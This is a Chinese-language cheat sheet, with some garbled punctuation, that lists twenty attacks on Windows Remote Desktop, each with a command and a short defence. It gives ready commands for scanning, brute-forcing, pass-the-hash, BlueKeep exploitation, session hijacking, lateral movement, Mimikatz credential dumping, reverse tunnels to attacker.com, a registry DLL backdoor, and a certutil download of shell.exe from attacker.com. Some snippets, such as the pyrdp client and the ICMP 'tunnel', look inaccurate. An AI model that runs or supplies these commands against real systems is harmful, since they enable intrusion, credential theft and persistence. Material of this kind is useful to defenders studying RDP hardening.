1����、全網(wǎng)段RDP端口掃描
masscan -p3389 10.0.0.0/8 --rate 100000 -oG rdp_scan.gnmap
原理:利用高速掃描定位全網(wǎng)開放3389端口的主機(jī)���,結(jié)合Nmap腳本識別Windows版本���。
防御:修改默認(rèn)RDP端口,防火墻過濾非可信IP訪問��。
2��、歷史證書關(guān)聯(lián)資產(chǎn)挖掘
curl "https://crt.sh/?q=%.target.com&output=json" | jq '.[].name_value' | grep "rdp"
原理:通過SSL證書透明度日志發(fā)現(xiàn)隱藏的RDP子域�。
防御:定期清理過期證書,禁用無關(guān)子域解析�����。
3���、多線程RDP暴力破解
hydra -V -f -L users.txt -P passwords.txt rdp://192.168.1.100 -t 64
原理:利用弱口令或默認(rèn)憑證(如Admin/123456)突破認(rèn)證��。
防御:啟用賬戶鎖定策略(3次失敗鎖定30分鐘)�����,強(qiáng)制復(fù)雜密碼����。
4、Pass-the-Hash攻擊
xfreerdp /v:target_ip /u:Administrator /pth:NTLM_HASH +sec-nla
原理:通過NTLM哈希繞過密碼驗證�,需NLA未強(qiáng)制啟用。
防御:啟用CredSSP或限制本地管理員賬戶遠(yuǎn)程登錄���。
5�����、 BlueKeep漏洞自動化利用
msf> use exploit/windows/rdp/cve_2019_0708_bluekeep
原理:CVE-2019-0708漏洞無需憑證實現(xiàn)遠(yuǎn)程代碼執(zhí)行�,影響Windows 7/2008��。
防御:及時安裝KB4499175補(bǔ)丁�,禁用老舊系統(tǒng)RDP服務(wù)。
6�、 RDP會話劫持(Session Hijacking)
tscon %SESSION_ID% /dest:rdp-tcp#0
原理:在已授權(quán)會話中注入新進(jìn)程����,接管活躍RDP連接��。
防御:啟用受限管理員模式��,監(jiān)控異常會話ID變更��。
7�、 WMI遠(yuǎn)程命令執(zhí)行
wmic /node:192.168.1.101 /user:DOMAIN\Admin process call create "cmd.exe /c reg add HKLM\..."
原理:通過WMI接口在遠(yuǎn)程主機(jī)執(zhí)行命令,需管理員權(quán)限�����。
防御:限制WMI遠(yuǎn)程訪問����,啟用Windows Defender ATP行為監(jiān)控�。
8、DCOM橫向移動
$com = [Activator]::CreateInstance([Type]::GetTypeFromProgID("MMC20.Application","192.168.1.102"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami","Minimized")
原理:利用DCOM組件繞過防火墻限制執(zhí)行命令�。
防御:禁用非必要DCOM組件,配置DCOM ACL權(quán)限�。
9、 Plink建立SSH隧道
plink -ssh -P 2222 -R 3389:localhost:3389 attacker.com -l user -i key.ppk
原理:通過SSH反向隧道暴露內(nèi)網(wǎng)RDP端口至公網(wǎng)�。
防御:監(jiān)控異常SSH外聯(lián)��,限制出站SSH流量���。
10、 Cloudflare Tunnel內(nèi)網(wǎng)穿透
cloudflared tunnel --url rdp://localhost:3389 --hostname rdp.attacker.com
原理:利用Cloudflare Zero Trust隱藏真實IP�����,繞過防火墻策略�。
防御:審查合法SaaS服務(wù)使用情況,阻斷未授權(quán)Tunnel進(jìn)程����。
11、 RDP影子會話劫持
mstsc /shadow:%SESSION_ID% /noConsentPrompt /control
原理:利用Windows影子會話功能接管活躍用戶桌面(需SYSTEM權(quán)限)�����。
防御:組策略禁用影子會話(計算機(jī)配置→管理模板→Windows組件→遠(yuǎn)程桌面服務(wù)→不允許遠(yuǎn)程控制)�����。
12���、 RDP自啟動后門植入
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "C:\backdoor.dll" /f
原理:通過注冊表劫持RDP客戶端加載惡意DLL�����。
防御:啟用Windows LSA保護(hù)��,監(jiān)控敏感注冊表項變更����。
13、繞過受限管理模式
$cred = New-Object System.Management.Automation.PSCredential("user", (ConvertTo-SecureString "Passw0rd!" -AsPlainText -Force))
Enter-PSSession -ComputerName target-pc -Credential $cred -Authentication Negotiate
原理:通過PowerShell Remoting繞過RDP登錄限制�。
防御:禁用WinRM服務(wù),限制PowerShell遠(yuǎn)程執(zhí)行權(quán)限�����。
14�����、NLA協(xié)議降級攻擊
xfreerdp /v:target_ip /u:user /p:password -sec-rdp
原理:強(qiáng)制使用弱加密的RDP協(xié)議(禁用NLA)�。
防御:組策略強(qiáng)制啟用僅允許使用網(wǎng)絡(luò)級別身份驗證的遠(yuǎn)程連接�����。
15、內(nèi)存提取RDP憑據(jù)
privilege::debug
sekurlsa::logonpasswords
原理:利用Mimikatz提取lsass進(jìn)程中緩存的RDP登錄憑據(jù)�。
防御:啟用Credential Guard,限制本地管理員權(quán)限�。
16、 RDP代理劫持攻擊
python3 rdpy-rdpclient.py target_ip -p 3389 -g attacker_ip:8888
原理:搭建中間人代理記錄鍵盤操作和屏幕截圖����。
防御:啟用RDP SSL加密(.rdp文件中enablecredsspsupport:i:1)。
17���、動態(tài)端口RDP服務(wù)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 54321 /f
netsh advfirewall firewall add rule name="CustomRDP" dir=in protocol=TCP localport=54321 action=allow
原理:修改注冊表動態(tài)變更RDP端口躲避掃描�。
防御:監(jiān)控注冊表敏感項修改����,限制端口變更權(quán)限。
18��、ICMP隱蔽隧道
sudo nping --icmp -c 0 --data-string "RDP_SESSION" target_ip
原理:通過ICMP協(xié)議封裝RDP流量繞過流量審計����。
防御:部署IDS規(guī)則檢測異常ICMP載荷長度(alert icmp any any -> any any (dsize:>100; msg:"ICMP Tunnel";))。
19����、RDP蜜罐識別繞過
Test-NetConnection -ComputerName target_ip -Port 3389 | Where-Object { $_.TcpTestSucceeded -eq $true -and $_.RemoteAddress -notmatch "192.168" }
原理:通過IP反查與響應(yīng)特征識別云蜜罐系統(tǒng)。
防御:部署高交互蜜罐(如Honeydrive),模擬真實業(yè)務(wù)流量���。
20��、全自動化RDP武器化
from pyrdp import RDPClient
client = RDPClient("target_ip", "user", "P@ssw0rd")
client.login()
client.execute("cmd.exe /c certutil -urlcache -split -f http://attacker.com/shell.exe C:\\Temp\\s.exe")
原理:利用Python庫實現(xiàn)RDP協(xié)議級自動化攻擊��。
防御:啟用Windows Attack Surface Reduction規(guī)則�����,限制未知進(jìn)程執(zhí)行���。
RDP作為企業(yè)核心入口,攻防對抗已進(jìn)入深水區(qū)����。防御建議:
- 1. 網(wǎng)絡(luò)層:啟用RDP Gateway,限制源IP白名單
- 2. 系統(tǒng)層:強(qiáng)制NLA認(rèn)證�����,定期更新補(bǔ)丁
- 3. 監(jiān)控層:部署UEBA分析異常登錄時間/地理位置
閱讀原文:原文鏈接
該文章在 2025/5/26 12:29:28 編輯過
400 186 1886
